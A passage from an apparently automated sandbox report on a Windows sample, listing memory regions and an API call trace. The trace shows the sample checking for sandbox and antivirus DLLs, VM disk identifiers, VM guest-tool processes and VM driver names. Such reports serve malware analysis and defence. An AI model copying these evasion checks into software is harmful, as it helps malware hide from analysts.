0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 351 start_va = 0x5a0000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 352 start_va = 0x4d0000 end_va = 0x4f9fff monitored = 0 entry_point = 0x4d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 353 start_va = 0x6a0000 end_va = 0x827fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 354 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 355 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 356 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 357 start_va = 0x830000 end_va = 0x9b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 358 start_va = 0x9c0000 end_va = 0x1dbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 359 start_va = 0x4d0000 end_va = 0x4d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 360 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 361 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 362 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 363 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 364 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 365 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 366 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 367 start_va = 0x1dc0000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 368 start_va = 0x76370000 end_va = 0x7776efff monitored = 0 entry_point = 0x7652b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 369 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 370 start_va = 0x74c60000 end_va = 0x75158fff monitored = 0 entry_point = 0x74e67610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 371 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 372 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 373 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 374 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 375 start_va = 0x77770000 end_va = 0x777b3fff monitored = 0 entry_point = 0x77777410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 376 start_va = 0x757f0000 end_va = 0x757fefff monitored = 0 entry_point = 0x757f2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 377 start_va = 0x1dc0000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 378 start_va = 0x1fa0000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 379 start_va = 0x1fb0000 end_va = 0x212afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 380 start_va = 0x2130000 end_va = 0x222ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 381 start_va = 0x4e0000 end_va = 0x4e5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 382 start_va = 0x4f0000 end_va = 0x4f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 818 start_va = 0x500000 end_va = 0x515fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Thread: id = 3 os_tid = 0x808 [0078.935] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="kernel32" | out: DestinationString="kernel32") [0078.935] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x74650000) returned 0x0 [0078.935] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="user32" | out: DestinationString="user32") [0078.935] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x74790000) returned 0x0 [0078.993] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="advapi32" | out: DestinationString="advapi32") [0078.993] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x77820000) returned 0x0 [0080.044] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="shell32" | out: DestinationString="shell32") [0080.044] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x76370000) returned 0x0 [0087.553] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0087.553] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x576fd8 [0087.553] GetKeyboardLayoutList (in: nBuff=1, lpList=0x576fd8 | out: lpList=0x576fd8) returned 1 [0087.554] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb0c | out: TokenHandle=0x19fb0c*=0x150) returned 1 [0087.554] GetTokenInformation (in: TokenHandle=0x150, TokenInformationClass=0x19, TokenInformation=0x19fb10, TokenInformationLength=0x14, ReturnLength=0x19fb08 | out: TokenInformation=0x19fb10, ReturnLength=0x19fb08) returned 1 [0087.555] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x19fd4c, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0087.555] CreateFileW (lpFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.555] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x158 [0087.556] MapViewOfFile (hFileMappingObject=0x158, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1fb0000 [0087.558] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd50, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe")) returned 0x62 [0087.559] wcsstr (_Str="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe", _SubStr="7869.vmt") returned 0x0 [0087.559] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x19ff4c, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x19ff4c, ResultLength=0x0) returned 0x0 [0087.559] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x19ff54, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ff54, ReturnLength=0x0) returned 0x0 [0087.560] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0087.560] GetModuleHandleA (lpModuleName="aswhook") returned 0x0 [0087.560] GetModuleHandleA (lpModuleName="snxhk") returned 0x0 [0087.560] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x578958 [0087.560] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0087.560] RtlInitUnicodeString (in: DestinationString=0x19ff20, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0087.560] NtOpenKey (in: KeyHandle=0x19ff40, DesiredAccess=0x9, ObjectAttributes=0x19ff28*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x19ff40*=0x0) returned 0xc0000034 [0087.560] LocalFree (hMem=0x578958) returned 0x0 [0087.560] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x578958 [0087.560] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0087.560] RtlInitUnicodeString (in: DestinationString=0x19ff20, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0087.560] NtOpenKey (in: KeyHandle=0x19ff40, DesiredAccess=0x9, ObjectAttributes=0x19ff28*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x19ff40*=0x15c) returned 0x0 [0087.561] NtQueryKey (in: KeyHandle=0x15c, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0087.561] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x579ff0 [0087.561] NtQueryKey (in: KeyHandle=0x15c, KeyInformationClass=0x2, KeyInformation=0x579ff0, Length=0x2c, ResultLength=0x19ff48 | out: KeyInformation=0x579ff0, ResultLength=0x19ff48) returned 0x0 [0087.561] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0087.561] LocalAlloc (uFlags=0x40, uBytes=0x4e) returned 0x57aaf8 [0087.561] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x57aaf8, Length=0x4e, ResultLength=0x19ff48 | out: KeyInformation=0x57aaf8, ResultLength=0x19ff48) returned 0x0 [0087.562] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="qemu") returned 0x0 [0087.562] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="virtio") returned 0x0 [0087.562] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="vmware") returned 0x0 [0087.562] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="vbox") returned 0x0 [0087.562] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="xen") returned 0x0 [0087.562] LocalFree (hMem=0x57aaf8) returned 0x0 [0087.562] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0087.562] LocalAlloc (uFlags=0x40, uBytes=0x44) returned 0x57aaf8 [0087.562] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x57aaf8, Length=0x44, ResultLength=0x19ff48 | out: KeyInformation=0x57aaf8, ResultLength=0x19ff48) returned 0x0 [0087.563] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="qemu") returned 0x0 [0087.563] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="virtio") returned 0x0 [0087.563] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="vmware") returned 0x0 [0087.563] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="vbox") returned 0x0 [0087.563] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="xen") returned 0x0 [0087.563] LocalFree (hMem=0x57aaf8) returned 0x0 [0087.563] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0087.563] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x57aaf8 [0087.563] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x57aaf8, Length=0x50, ResultLength=0x19ff48 | out: KeyInformation=0x57aaf8, ResultLength=0x19ff48) returned 0x0 [0087.564] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="qemu") returned 0x0 [0087.564] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="virtio") returned 0x0 [0087.564] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="vmware") returned 0x0 [0087.564] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="vbox") returned 0x0 [0087.564] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="xen") returned 0x0 [0087.564] LocalFree (hMem=0x57aaf8) returned 0x0 [0087.564] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0087.564] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x57aaf8 [0087.564] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x57aaf8, Length=0x46, ResultLength=0x19ff48 | out: KeyInformation=0x57aaf8, ResultLength=0x19ff48) returned 0x0 [0087.565] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="qemu") returned 0x0 [0087.565] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="virtio") returned 0x0 [0087.565] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="vmware") returned 0x0 [0087.565] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="vbox") returned 0x0 [0087.565] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="xen") returned 0x0 [0087.565] LocalFree (hMem=0x57aaf8) returned 0x0 [0087.565] LocalFree (hMem=0x579ff0) returned 0x0 [0087.565] NtClose (Handle=0x15c) returned 0x0 [0087.565] LocalFree (hMem=0x578958) returned 0x0 [0087.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x19ff54 | out: SystemInformation=0x0, ResultLength=0x19ff54*=0x20a80) returned 0xc0000004 [0087.602] LocalAlloc (uFlags=0x40, uBytes=0x21a80) returned 0x1dc2050 [0087.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1dc2050, Length=0x21a80, ResultLength=0x19ff54 | out: SystemInformation=0x1dc2050, ResultLength=0x19ff54*=0x196a0) returned 0x0 [0087.610] wcsstr (_Str="system", _SubStr="qemu-ga.exe") returned 0x0 [0087.610] wcsstr (_Str="system", _SubStr="qga.exe") returned 0x0 [0087.611] wcsstr (_Str="system", _SubStr="windanr.exe") returned 0x0 [0087.611] wcsstr (_Str="system", _SubStr="vboxservice.exe") returned 0x0 [0087.611] wcsstr (_Str="system", _SubStr="vboxtray.exe") returned 0x0 [0087.611] wcsstr (_Str="system", _SubStr="vmtoolsd.exe") returned 0x0 [0087.611] wcsstr (_Str="system", _SubStr="prl_tools.exe") returned 0x0 [0087.611] wcsstr (_Str="smss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0087.611] wcsstr (_Str="smss.exe", _SubStr="qga.exe") returned 0x0 [0087.611] wcsstr (_Str="smss.exe", _SubStr="windanr.exe") returned 0x0 [0087.611] wcsstr (_Str="smss.exe", _SubStr="vboxservice.exe") returned 0x0 [0087.611] wcsstr (_Str="smss.exe", _SubStr="vboxtray.exe") returned 0x0 [0087.611] wcsstr (_Str="smss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0087.611] wcsstr (_Str="smss.exe", _SubStr="prl_tools.exe") returned 0x0 [0087.611] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0087.611] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0087.611] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0087.611] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0087.611] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0087.611] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0087.611] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0087.612] wcsstr (_Str="wininit.exe", _SubStr="qemu-ga.exe") returned 0x0 [0087.612] wcsstr (_Str="wininit.exe", _SubStr="qga.exe") returned 0x0 [0087.612] wcsstr (_Str="wininit.exe", _SubStr="windanr.exe") returned 0x0 [0087.612] wcsstr (_Str="wininit.exe", _SubStr="vboxservice.exe") returned 0x0 [0087.612] wcsstr (_Str="wininit.exe", _SubStr="vboxtray.exe") returned 0x0 [0087.612] wcsstr (_Str="wininit.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0087.612] wcsstr (_Str="wininit.exe", _SubStr="prl_tools.exe") returned 0x0 [0087.612] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0087.612] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0087.612] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0087.612] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0087.612] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0087.612] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0087.612] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0087.613] wcsstr (_Str="winlogon.exe", _SubStr="qemu-ga.exe") returned 0x0 [0087.613] wcsstr (_Str="winlogon.exe", _SubStr="qga.exe") returned 0x0 [0087.613] wcsstr (_Str="winlogon.exe", _SubStr="windanr.exe") returned 0x0 [0087.613] wcsstr (_Str="winlogon.exe", _SubStr="vboxservice.exe") returned 0x0 [0087.613] wcsstr (_Str="winlogon.exe", _SubStr="vboxtray.exe") returned 0x0 [0087.613] wcsstr (_Str="winlogon.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0087.613] wcsstr (_Str="winlogon.exe", _SubStr="prl_tools.exe") returned 0x0 [0087.613] wcsstr (_Str="services.exe", _SubStr="qemu-ga.exe") returned 0x0 [0087.613] wcsstr (_Str="services.exe", _SubStr="qga.exe") returned 0x0 [0087.613] wcsstr (_Str="services.exe", _SubStr="windanr.exe") returned 0x0 [0087.613] wcsstr (_Str="services.exe", _SubStr="vboxservice.exe") returned 0x0 [0087.613] wcsstr (_Str="services.exe", _SubStr="vboxtray.exe") returned 0x0 [0087.613] wcsstr (_Str="services.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0087.613] wcsstr (_Str="services.exe", _SubStr="prl_tools.exe") returned 0x0 [0087.614] wcsstr (_Str="lsass.exe", _SubStr="qemu-ga.exe") returned 0x0 [0087.614] wcsstr (_Str="lsass.exe", _SubStr="qga.exe") returned 0x0 [0087.614] wcsstr (_Str="lsass.exe", _SubStr="windanr.exe") returned 0x0 [0087.614] wcsstr (_Str="lsass.exe", _SubStr="vboxservice.exe") returned 0x0 [0087.614] wcsstr (_Str="lsass.exe", _SubStr="vboxtray.exe") returned 0x0 [0087.614] wcsstr (_Str="lsass.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0087.614] wcsstr (_Str="lsass.exe", _SubStr="prl_tools.exe") returned 0x0 [0087.614] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0087.614] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0087.614] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0087.615] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0087.615] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0087.615] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0087.615] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0087.615] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0087.615] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0087.615] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0087.615] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0087.615] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0087.615] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0087.615] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0087.615] wcsstr (_Str="dwm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0087.615] wcsstr (_Str="dwm.exe", _SubStr="qga.exe") returned 0x0 [0087.615] wcsstr (_Str="dwm.exe", _SubStr="windanr.exe") returned 0x0 [0087.615] wcsstr (_Str="dwm.exe", _SubStr="vboxservice.exe") returned 0x0 [0087.615] wcsstr (_Str="dwm.exe", _SubStr="vboxtray.exe") returned 0x0 [0087.615] wcsstr (_Str="dwm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0087.615] wcsstr (_Str="dwm.exe", _SubStr="prl_tools.exe") returned 0x0 [0087.616] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0087.616] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0087.616] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0087.616] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0087.616] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0087.616] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0087.616] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0087.616] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0087.616] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0087.616] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0087.616] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0087.616] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0087.617] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0087.617] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0087.617] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0087.617] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0087.617] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0087.617] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0087.617] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0087.617] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0087.617] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0087.617] LocalFree (hMem=0x1dc2050) returned 0x0 [0087.618] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x0, Length=0x0, ResultLength=0x19ff54 | out: SystemInformation=0x0, ResultLength=0x19ff54*=0x9800) returned 0xc0000004 [0087.618] LocalAlloc (uFlags=0x40, uBytes=0xa800) returned 0x1dc2050 [0087.618] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x1dc2050, Length=0xa800, ResultLength=0x19ff54 | out: SystemInformation=0x1dc2050, ResultLength=0x19ff54*=0x9800) returned 0x0 [0087.619] strstr (_Str="ntoskrnl.exe", _SubStr="vmci.s") returned 0x0 [0087.619] strstr (_Str="ntoskrnl.exe", _SubStr="vmusbm") returned 0x0 [0087.619] strstr (_Str="ntoskrnl.exe", _SubStr="vmmous") returned 0x0 [0087.619] strstr (_Str="ntoskrnl.exe", _SubStr="vm3dmp") returned 0x0 [0087.619] strstr (_Str="ntoskrnl.exe", _SubStr="vmrawd") returned 0x0 [0087.619] strstr (_Str="ntoskrnl.exe", _SubStr="vmmemc") returned 0x0 [0087.619] strstr (_Str="ntoskrnl.exe", _SubStr="vboxgu") returned 0x0 [0087.619] strstr (_Str="ntoskrnl.exe", _SubStr="vboxsf") returned 0x0 [0087.619] strstr (_Str="ntoskrnl.exe", _SubStr="vboxmo") returned 0x0 [0087.619] strstr (_Str="ntoskrnl.exe", _SubStr="vboxvi") returned 0x0 [0087.619] strstr (_Str="ntoskrnl.exe", _SubStr="vboxdi") returned 0x0 [0087.619] strstr (_Str="ntoskrnl.exe", _SubStr="vioser") returned 0x0 [0087.619] strstr (_Str="hal.dll", _SubStr="vmci.s") returned 0x0 [0087.619] strstr (_Str="hal.dll", _SubStr="vmusbm") returned 0x0 [0087.619] strstr (_Str="hal.dll", _SubStr="vmmous") returned 0x0 [0087.619] strstr (_Str="hal.dll", _SubStr="vm3dmp") returned 0x0 [0087.619] strstr (_Str="hal.dll", _SubStr="vmrawd") returned 0x0 [0087.619] strstr (_Str="hal.dll", _SubStr="vmmemc") returned 0x0 